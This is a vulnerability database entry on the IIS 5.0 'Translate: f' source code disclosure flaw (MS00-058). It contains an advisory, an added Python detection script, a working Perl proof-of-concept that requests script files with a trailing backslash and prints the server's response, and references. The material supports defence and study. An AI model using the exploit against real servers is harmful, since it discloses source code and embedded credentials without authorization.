Microsoft IIS 5.0 "Translate: f" Header Source Code Disclosure Vulnerability (MS00-058)

Vulnerability ID: 1105960    Vulnerability type: Unknown
Published: 2000-08-14    Updated: 2005-10-12
CVE ID: CVE-2000-0778    CNNVD ID: CNNVD-200010-019
Platform: Windows    CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/20152
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-019
|Vulnerability details
IIS is a popular HTTP server developed by Microsoft and bundled with the Windows operating system. IIS 5.0 has a vulnerability in its handling of certain HTTP requests that carry a special header; a remote attacker may exploit it to obtain the source code of scripts on the server. If IIS 5.0 receives an HTTP request containing the special header (Translate: f) and the URL also ends with a special character ("/"), IIS incorrectly invokes the script handling engine, which can cause the file's source code to be disclosed to the remote user.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/1578/info
 
Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, process them accordingly, and then execute them on the server.
 
It is possible to force the server to send back the source of known scriptable files to the client if the HTTP GET request contains a specialized header with 'Translate: f' at the end of it, and if a trailing slash '/' is appended to the end of the URL. The scripting engine will be able to locate the requested file, however, it will not recognize it as a file that needs to be processed and will proceed to send the file source to the client.
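As an added defensive example that is not part of the original advisory or exploit, the following Python code parses raw HTTP request text and flags requests matching the pattern described above: a Translate: f header combined with a trailing '/' or '\' after a scriptable file name. The sample requests, the hostname and the extension list (.asp, .asa, .htr) are constructed assumptions for illustration.

```python
from typing import Any, Dict, List

# Extensions IIS 5.0 hands to a scripting engine. The page names ASP, ASA and HTR;
# the exact set used here is an assumption for this example.
SCRIPT_EXTENSIONS = (".asp", ".asa", ".htr")

# Constructed sample requests (not from the original page), one raw HTTP request each.
SAMPLE_REQUESTS: List[str] = [
    "GET /default.asp\\ HTTP/1.0\r\nHost: www.example.test\r\nTranslate: f\r\n\r\n",
    "GET /global.asa/ HTTP/1.0\r\nHost: www.example.test\r\nTranslate: F\r\n\r\n",
    "GET /default.asp HTTP/1.0\r\nHost: www.example.test\r\nTranslate: f\r\n\r\n",
    "GET /index.html/ HTTP/1.0\r\nHost: www.example.test\r\nTranslate: f\r\n\r\n",
    "GET /default.asp/ HTTP/1.0\r\nHost: www.example.test\r\n\r\n",
]


def parse_request(raw: str) -> Dict[str, Any]:
    """Split a raw HTTP/1.x request into request-line parts and a lowercase header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % lines[0])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "target": parts[1], "version": parts[2], "headers": headers}


def is_translate_f_probe(raw: str) -> bool:
    """True when the request matches the MS00-058 pattern: a Translate: f header
    plus a trailing '/' or '\\' appended after a scriptable file name."""
    req = parse_request(raw)
    if req["headers"].get("translate", "").lower() != "f":
        return False
    path = req["target"].split("?", 1)[0]          # ignore any query string
    if not path or path[-1] not in "/\\":
        return False
    return path.rstrip("/\\").lower().endswith(SCRIPT_EXTENSIONS)


def scan(requests: List[str]) -> List[int]:
    """Return the indexes of the requests that should raise an alert."""
    return [i for i, raw in enumerate(requests) if is_translate_f_probe(raw)]
```

Only the first two sample requests match: the third lacks the trailing character, the fourth targets a static file, and the fifth has no Translate header.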


#!/usr/bin/perl
# Proof-of-concept request for MS00-058: asks for a script file with a trailing
# backslash and a "Translate: f" header, then prints whatever the server returns.
use Socket;

#### test arguments
if ($#ARGV != 2) { die "usage: DNS_name/IP file_to_get port\n"; }
#### load values
$host   = $ARGV[0];
$toget  = $ARGV[1];
$port   = $ARGV[2];
$target = inet_aton($host) || die("Cannot resolve $host\n");
#### build request: file name followed by "\" plus the Translate: f header
$xtosend = <<EOT
GET /$toget\\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f

EOT
;
$xtosend =~ s/\n/\r\n/g;   # HTTP requires CRLF line endings
#### send request
#print $xtosend;
my @results = sendraw($xtosend);
print @results;

#### Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
    my ($pstr) = @_;
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) ||
        die("Socket problems\n");
    if (connect(S, sockaddr_in($port, $target))) {
        my @in;
        select(S); $| = 1; print $pstr;   # unbuffered write of the request
        while (<S>) { push @in, $_; }      # collect the whole response
        select(STDOUT); close(S); return @in;
    } else { die("Can't connect...\n"); }
}
|References

Source: BUGTRAQ
Name: 20000815 Translate: f summary, history and thoughts
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg=080D5336D882D211B56B0060080F2CD696A7C9@beta.mia.cz
Source: MS
Name: MS00-058
Link: http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
Source: BID
Name: 1578
Link: http://www.securityfocus.com/bid/1578
Source: NTBUGTRAQ
Name: 20000816 Translate: f
Link: http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0008&L=ntbugtraq&F=&S=&P=5212
Source: US Government Resource: oval:org.mitre.oval:def:927
Name: oval:org.mitre.oval:def:927
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:927
Source: NSFOCUS
Name: 752
Link: http://www.nsfocus.net/vulndb/752